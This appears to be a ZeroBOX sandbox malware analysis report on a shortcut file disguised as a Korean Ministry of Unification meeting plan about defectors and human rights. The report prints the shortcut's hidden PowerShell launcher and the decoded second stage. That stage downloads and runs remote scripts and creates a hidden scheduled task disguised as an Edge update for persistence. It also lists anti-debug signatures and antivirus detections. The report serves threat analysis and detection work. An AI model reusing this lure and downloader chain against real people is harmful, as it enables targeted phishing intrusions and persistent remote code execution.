Summary | ZeroBOX

통일부 5월 간담회 계획안(줄리 터너대사 방한건_인권 탈북).docx.lnk

Generic Malware Antivirus GIF Format Lnk Format AntiVM AntiDebug PowerShell
Category Machine Started Completed
FILE s1_win7_x6403_us Aug. 21, 2024, 3:14 p.m. Aug. 21, 2024, 3:15 p.m.
Size 310.8KB
Type MS Windows shortcut, Has Description string, Has command line arguments, Icon number=0, ctime=Sun Dec 31 15:32:08 1600, mtime=Sun Dec 31 15:32:08 1600, atime=Sun Dec 31 15:32:08 1600, length=0, window=hidenormalshowminimized
MD5 028075a00beb580aae25e2d60180889f
SHA256 1d5d65f2eb065bac629c82a3399fbdc28ebe33eb288c1cd556cca6b4e6230b52
CRC32 A65B637A
ssdeep 1536:Q8tPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLo:2
Yara
  • Antivirus - Contains references to security software
  • lnk_file_format - Microsoft Windows Shortcut File Format
  • Lnk_Format_Zero - LNK Format

  • cmd.exe (PID 2004): "C:\Windows\System32\cmd.exe" /c start /wait "rWzKnoaMZVOkFHg" "C:\Users\test22\AppData\Local\Temp\통일부 5월 간담회 계획안(줄리 터너대사 방한건_인권 탈북).docx.lnk"
    • powershell.exe (PID 2064): "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -nop -NoProfile -NonInteractive -ExecutionPolicy Bypass -c "$ss =\"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\"; $aa = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($ss));$cc = [System.IO.Path]::GetTempPath();$dd = \"hello9.ps1\";$ee = Join-Path $cc $dd;$aa | Out-File -FilePath $ee; $aaaaa= 89897878; powershell -windowstyle hidden -ExecutionPolicy Bypass $ee"

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

Time & API Arguments Status Return Repeated

WriteConsoleW

buffer (consecutive 80-column console writes, joined):
The term 'Invoke-WebRequest' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At C:\Users\test22\AppData\Local\Temp\hello9.ps1:1 char:111
+ $hhh = Join-Path ([System.IO.Path]::GetTempPath()) "통일부 5월 간담회 계획안(줄리 터너대사 방한건_인권 탈북).docx"; Invoke-WebRequest <<<< -Uri "http://127.0.0.1/0521.docx" -OutFile $hhh; & $hhh; $filePath = Join-Path ([System.IO.Path]::GetTempPath()) "ms_update.ps1"; $str = '$aaa = Join-Path ([System.IO.Path]::GetTempPath()) "ttt.ps1"; Invoke-WebRequest -Uri "http://127.0.0.2/0521-x.txt" -OutFile $aaa; & $aaa; Remove-Item -Path $aaa -Force;'; $str | Out-File -FilePath $filePath -Encoding UTF8; $action = New-ScheduledTaskAction -Execute 'PowerShell.exe' -Argument '-WindowStyle Hidden -nop -NonInteractive -NoProfile -ExecutionPolicy Bypass -Command "& {$filePath = Join-Path ([System.IO.Path]::GetTempPath()) \"ms_update.ps1\"; powershell -windowstyle hidden -ExecutionPolicy Bypass -File $filePath;}"'; $trigger = New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(5) -RepetitionInterval (New-TimeSpan -Minutes 30); $settings = New-ScheduledTaskSettingsSet -Hidden; Register-ScheduledTask -TaskName "MicrosoftEdgeUpdateTaskMachineTUAK" -Action $action -Trigger $trigger -Settings $settings; $aaa = Join-Path ([System.IO.Path]::GetTempPath()) "sw_first.ps1"; Invoke-WebRequest -Uri "https://127.0.0.3/0521-f.txt" -OutFile $aaa; & $aaa; Remove-Item -Path $aaa -Force;
+ CategoryInfo : ObjectNotFound: (Invoke-WebRequest:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
The term 'C:\Users\test22\AppData\Local\Temp\통일부 5월 간담회 계획안(줄리 터너대사 방한건_인권 탈북).docx' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At C:\Users\test22\AppData\Local\Temp\hello9.ps1:1 char:162
+ $hhh = Join-Path ([System.IO.Path]::GetTempPath()) "통일부 5월 간담회 계획안(줄리 터너대사 방한건_인권 탈북).docx"; Invoke-WebRequest -Uri "http://127.0.0.1/0521.docx" -OutFile $hhh; & <<<< $hhh; $filePath = Join-Path ([System.IO.Path]::GetTempPath()) "ms_update.ps1"; $str = '$aaa = Join-Path ([System.IO.Path]::GetTempPath()) "ttt.ps1"; Invoke-WebRequest -Uri "http://127.0.0.2/0521-x.txt" -OutFile $aaa; & $aaa; Remove-Item -Path $aaa -Force;'; $str | Out-File -FilePath $filePath -Encoding UTF8; $action = New-ScheduledTaskAction -Execute 'PowerShell.exe' -Argument '-WindowStyle Hidden -nop -NonInteractive -NoProfile -ExecutionPolicy Bypass -Command "& {$filePath = Join-Path ([System.IO.Path]::GetTempPath()) \"ms_update.ps1\"; powershell -windowstyle hidden -ExecutionPolicy Bypass -File $filePath;}"'; $trigger = New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(5) -RepetitionInterval (New-TimeSpan -Minutes 30); $settings = New-ScheduledTaskSettingsSet -Hidden; Register-ScheduledTask -TaskName "MicrosoftEdgeUpdateTaskMachineTUAK" -Action $action -Trigger $trigger -Settings $settings; $aaa = Join-Path ([System.IO.Path]::GetTempPath()) "sw_first.ps1"; Invoke-WebRequest -Uri "https://127.0.0.3/0521-f.txt" -OutFile $aaa; & $aaa; Remove-Item -Path $aaa -Force;
+ CategoryInfo : ObjectNotFound: (C:\Users\test22...방한건_인권 탈북).docx:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
The term 'New-ScheduledTaskAction' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
1 1 0 (each call)
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00630310
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2064
region_size: 1703936
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02720000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2064
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02880000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2064
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72fd1000
process_handle: 0xffffffff
1 0 0

file C:\Users\test22\AppData\Local\Temp\ms_update.ps1
file C:\Users\test22\AppData\Local\Temp\hello9.ps1
file C:\Users\test22\AppData\Local\Temp\통일부 5월 간담회 계획안(줄리 터너대사 방한건_인권 탈북).docx.lnk
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -nop -NoProfile -NonInteractive -ExecutionPolicy Bypass -c "$ss =\"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\"; $aa = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($ss));$cc = [System.IO.Path]::GetTempPath();$dd = \"hello9.ps1\";$ee = Join-Path $cc $dd;$aa | Out-File -FilePath $ee; $aaaaa= 89897878; powershell -windowstyle hidden -ExecutionPolicy Bypass $ee"
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypass C:\Users\test22\AppData\Local\Temp\hello9.ps1
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2068
thread_handle: 0x000002ec
process_identifier: 2064
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -nop -NoProfile -NonInteractive -ExecutionPolicy Bypass -c "$ss =\"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\"; $aa = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($ss));$cc = [System.IO.Path]::GetTempPath();$dd = \"hello9.ps1\";$ee = Join-Path $cc $dd;$aa | Out-File -FilePath $ee; $aaaaa= 89897878; powershell -windowstyle hidden -ExecutionPolicy Bypass $ee"
filepath_r: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_SUSPENDED|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000002f4
1 1 0

CreateProcessInternalW

thread_identifier: 2216
thread_handle: 0x00000484
process_identifier: 2212
current_directory: C:\Users\test22\AppData\Local\Temp
filepath:
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypass C:\Users\test22\AppData\Local\Temp\hello9.ps1
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 1
process_handle: 0x00000488
1 1 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

Rule                        Description
DebuggerCheck__GlobalFlags  (no description)
DebuggerCheck__QueryInfo    (no description)
DebuggerHiding__Thread      (no description)
DebuggerHiding__Active      (no description)
ThreadControl__Context      (no description)
SEH__vectored               (no description)
anti_dbg                    Checks if being debugged
disable_dep                 Bypass DEP
Vendor            Detection
Lionic            Trojan.WinLNK.Powecod.4!c
Skyhigh           BehavesLike.Trojan.fl
ALYac             Trojan.Agent.LNK.Gen
Symantec          Scr.Mallnk!gen1
McAfee            Artemis!028075A00BEB
Avast             LNK:Agent-EL [Trj]
Kaspersky         HEUR:Trojan.Multi.Powecod.a
MicroWorld-eScan  Trojan.GenericKD.73873058
Rising            Trojan.PSRunner/LNK!1.BADE (CLASSIC)
Sophos            Troj/LnkObf-T
SentinelOne       Static AI - Suspicious LNK
Google            Detected
Kingsoft          Script.Troj.CMDLnk.22143
ZoneAlarm         HEUR:Trojan.Multi.Powecod.a
Varist            LNK/ABTrojan.QOOA-
VBA32             Trojan.Link.Crafted
huorong           TrojanDownloader/LNK.Netloader.r
AVG               LNK:Agent-EL [Trj]
alibabacloud      Trojan:Multi/Powecod.a
parent_process powershell.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypass C:\Users\test22\AppData\Local\Temp\hello9.ps1
Process injection Process 2004 resumed a thread in remote process 2064
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x000002ec
suspend_count: 1
process_identifier: 2064
1 0 0
Option                   Description
-executionpolicy bypass  Attempts to bypass execution policy
-nop                     Does not load current user profile
-windowstyle hidden      Attempts to execute command with a hidden window
-noninteractive          Prevents creating an interactive prompt for the user
-executionpolicy bypass  Attempts to bypass execution policy
-windowstyle hidden      Attempts to execute command with a hidden window
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe